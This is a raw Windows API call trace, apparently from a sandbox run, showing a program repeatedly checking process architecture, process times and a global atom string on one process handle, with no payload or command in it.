	[0119.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.973] CloseHandle (hObject=0x698) returned 1
	[0119.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.973] CloseHandle (hObject=0x698) returned 1
	[0119.974] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.974] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.974] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.974] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.975] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.975] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.975] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.975] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.975] CloseHandle (hObject=0x698) returned 1
	[0119.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.975] CloseHandle (hObject=0x698) returned 1
	[0119.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.975] CloseHandle (hObject=0x698) returned 1
	[0119.976] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.976] CloseHandle (hObject=0x698) returned 1
	[0120.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.011] CloseHandle (hObject=0x698) returned 1
	[0120.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.011] CloseHandle (hObject=0x698) returned 1
	[0120.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.011] CloseHandle (hObject=0x698) returned 1
	[0120.011] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.012] CloseHandle (hObject=0x698) returned 1
	[0120.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.012] CloseHandle (hObject=0x698) returned 1
	[0120.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.012] CloseHandle (hObject=0x698) returned 1
	[0120.012] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.012] CloseHandle (hObject=0x698) returned 1
	[0120.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.013] CloseHandle (hObject=0x698) returned 1
	[0120.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.013] CloseHandle (hObject=0x698) returned 1
	[0120.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.013] CloseHandle (hObject=0x698) returned 1
	[0120.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.013] CloseHandle (hObject=0x698) returned 1
	[0120.013] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.013] CloseHandle (hObject=0x698) returned 1
	[0120.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.014] CloseHandle (hObject=0x698) returned 1
	[0120.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.014] CloseHandle (hObject=0x698) returned 1
	[0120.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.014] CloseHandle (hObject=0x698) returned 1
	[0120.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.014] CloseHandle (hObject=0x698) returned 1
	[0120.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.014] CloseHandle (hObject=0x698) returned 1
	[0120.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.015] CloseHandle (hObject=0x698) returned 1
	[0120.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.015] CloseHandle (hObject=0x698) returned 1
	[0120.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.015] CloseHandle (hObject=0x698) returned 1
	[0120.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.015] CloseHandle (hObject=0x698) returned 1
	[0120.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.015] CloseHandle (hObject=0x698) returned 1
	[0120.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.016] CloseHandle (hObject=0x698) returned 1
	[0120.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.016] CloseHandle (hObject=0x698) returned 1
	[0120.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.016] CloseHandle (hObject=0x698) returned 1
	[0120.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.016] CloseHandle (hObject=0x698) returned 1
	[0120.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.016] CloseHandle (hObject=0x698) returned 1
	[0120.017] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.017] CloseHandle (hObject=0x698) returned 1
	[0120.017] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.017] CloseHandle (hObject=0x698) returned 1
	[0120.017] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.017] CloseHandle (hObject=0x698) returned 1
	[0120.017] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.017] CloseHandle (hObject=0x698) returned 1
	[0120.018] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.018] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.018] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.018] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.019] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.019] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.019] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.019] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.019] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.020] CloseHandle (hObject=0x698) returned 1
	[0120.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.020] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.020] CloseHandle (hObject=0x698) returned 1
	[0120.020] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.020] CloseHandle (hObject=0x698) returned 1
	[0120.020] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.020] CloseHandle (hObject=0x698) returned 1
	[0120.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.054] CloseHandle (hObject=0x698) returned 1
	[0120.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.054] CloseHandle (hObject=0x698) returned 1
	[0120.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.054] CloseHandle (hObject=0x698) returned 1
	[0120.054] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.054] CloseHandle (hObject=0x698) returned 1
	[0120.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.055] CloseHandle (hObject=0x698) returned 1
	[0120.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.055] CloseHandle (hObject=0x698) returned 1
	[0120.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.055] CloseHandle (hObject=0x698) returned 1
	[0120.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.055] CloseHandle (hObject=0x698) returned 1
	[0120.055] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.055] CloseHandle (hObject=0x698) returned 1
	[0120.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.056] CloseHandle (hObject=0x698) returned 1
	[0120.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.056] CloseHandle (hObject=0x698) returned 1
	[0120.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.056] CloseHandle (hObject=0x698) returned 1
	[0120.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.056] CloseHandle (hObject=0x698) returned 1
	[0120.056] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.056] CloseHandle (hObject=0x698) returned 1
	[0120.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.057] CloseHandle (hObject=0x698) returned 1
	[0120.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.057] CloseHandle (hObject=0x698) returned 1
	[0120.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.057] CloseHandle (hObject=0x698) returned 1
	[0120.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.057] CloseHandle (hObject=0x698) returned 1
	[0120.057] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.057] CloseHandle (hObject=0x698) returned 1
	[0120.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.058] CloseHandle (hObject=0x698) returned 1
	[0120.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.058] CloseHandle (hObject=0x698) returned 1
	[0120.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.058] CloseHandle (hObject=0x698) returned 1
	[0120.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.058] CloseHandle (hObject=0x698) returned 1
	[0120.058] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.058] CloseHandle (hObject=0x698) returned 1
	[0120.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.059] CloseHandle (hObject=0x698) returned 1
	[0120.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.059] CloseHandle (hObject=0x698) returned 1
	[0120.059] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.059] CloseHandle (hObject=0x698) returned 1
	[0120.060] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.060] CloseHandle (hObject=0x698) returned 1
	[0120.060] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.060] CloseHandle (hObject=0x698) returned 1
	[0120.060] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.060] CloseHandle (hObject=0x698) returned 1
	[0120.060] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.060] CloseHandle (hObject=0x698) returned 1
	[0120.061] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.061] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.061] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.061] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.061] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.062] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.062] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.062] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.062] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.062] CloseHandle (hObject=0x698) returned 1
	[0120.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.062] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.062] CloseHandle (hObject=0x698) returned 1
	[0120.062] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.062] CloseHandle (hObject=0x698) returned 1
	[0120.063] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.063] CloseHandle (hObject=0x698) returned 1
	[0120.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.108] CloseHandle (hObject=0x698) returned 1
	[0120.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.108] CloseHandle (hObject=0x698) returned 1
	[0120.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.108] CloseHandle (hObject=0x698) returned 1
	[0120.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.108] CloseHandle (hObject=0x698) returned 1
	[0120.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.109] CloseHandle (hObject=0x698) returned 1
	[0120.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.109] CloseHandle (hObject=0x698) returned 1
	[0120.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.109] CloseHandle (hObject=0x698) returned 1
	[0120.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.109] CloseHandle (hObject=0x698) returned 1
	[0120.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.110] CloseHandle (hObject=0x698) returned 1
	[0120.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.110] CloseHandle (hObject=0x698) returned 1
	[0120.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.110] CloseHandle (hObject=0x698) returned 1
	[0120.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.110] CloseHandle (hObject=0x698) returned 1
	[0120.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.111] CloseHandle (hObject=0x698) returned 1
	[0120.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.111] CloseHandle (hObject=0x698) returned 1
	[0120.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.111] CloseHandle (hObject=0x698) returned 1
	[0120.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.111] CloseHandle (hObject=0x698) returned 1
	[0120.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.111] CloseHandle (hObject=0x698) returned 1
	[0120.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.112] CloseHandle (hObject=0x698) returned 1
	[0120.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.112] CloseHandle (hObject=0x698) returned 1
	[0120.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.112] CloseHandle (hObject=0x698) returned 1
	[0120.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.112] CloseHandle (hObject=0x698) returned 1
	[0120.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.112] CloseHandle (hObject=0x698) returned 1
	[0120.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.113] CloseHandle (hObject=0x698) returned 1
	[0120.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.113] CloseHandle (hObject=0x698) returned 1
	[0120.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.113] CloseHandle (hObject=0x698) returned 1
	[0120.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.113] CloseHandle (hObject=0x698) returned 1
	[0120.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.114] CloseHandle (hObject=0x698) returned 1
	[0120.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.114] CloseHandle (hObject=0x698) returned 1
	[0120.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.114] CloseHandle (hObject=0x698) returned 1
	[0120.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.114] CloseHandle (hObject=0x698) returned 1
	[0120.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.115] CloseHandle (hObject=0x698) returned 1
	[0120.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.115] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.115] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.116] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.116] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.116] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.116] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.116] CloseHandle (hObject=0x698) returned 1
	[0120.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.116] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.117] CloseHandle (hObject=0x698) returned 1
	[0120.117] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.117] CloseHandle (hObject=0x698) returned 1
	[0120.117] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.117] CloseHandle (hObject=0x698) returned 1
	[0120.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.247] CloseHandle (hObject=0x698) returned 1
	[0120.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.247] CloseHandle (hObject=0x698) returned 1
	[0120.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.248] CloseHandle (hObject=0x698) returned 1
	[0120.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.248] CloseHandle (hObject=0x698) returned 1
	[0120.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.248] CloseHandle (hObject=0x698) returned 1
	[0120.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.248] CloseHandle (hObject=0x698) returned 1
	[0120.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.249] CloseHandle (hObject=0x698) returned 1
	[0120.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.249] CloseHandle (hObject=0x698) returned 1
	[0120.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.249] CloseHandle (hObject=0x698) returned 1
	[0120.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.249] CloseHandle (hObject=0x698) returned 1
	[0120.249] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.249] CloseHandle (hObject=0x698) returned 1
	[0120.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.250] CloseHandle (hObject=0x698) returned 1
	[0120.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.250] CloseHandle (hObject=0x698) returned 1
	[0120.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.250] CloseHandle (hObject=0x698) returned 1
	[0120.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.250] CloseHandle (hObject=0x698) returned 1
	[0120.250] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.250] CloseHandle (hObject=0x698) returned 1
	[0120.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.251] CloseHandle (hObject=0x698) returned 1
	[0120.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.251] CloseHandle (hObject=0x698) returned 1
	[0120.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.251] CloseHandle (hObject=0x698) returned 1
	[0120.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.251] CloseHandle (hObject=0x698) returned 1
	[0120.251] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.251] CloseHandle (hObject=0x698) returned 1
	[0120.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.252] CloseHandle (hObject=0x698) returned 1
	[0120.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.252] CloseHandle (hObject=0x698) returned 1
	[0120.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.252] CloseHandle (hObject=0x698) returned 1
	[0120.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.252] CloseHandle (hObject=0x698) returned 1
	[0120.252] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.252] CloseHandle (hObject=0x698) returned 1
	[0120.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.253] CloseHandle (hObject=0x698) returned 1
	[0120.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.253] CloseHandle (hObject=0x698) returned 1
	[0120.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.253] CloseHandle (hObject=0x698) returned 1
	[0120.253] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.253] CloseHandle (hObject=0x698) returned 1
	[0120.254] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.254] CloseHandle (hObject=0x698) returned 1
	[0120.254] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.254] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.254] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.255] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
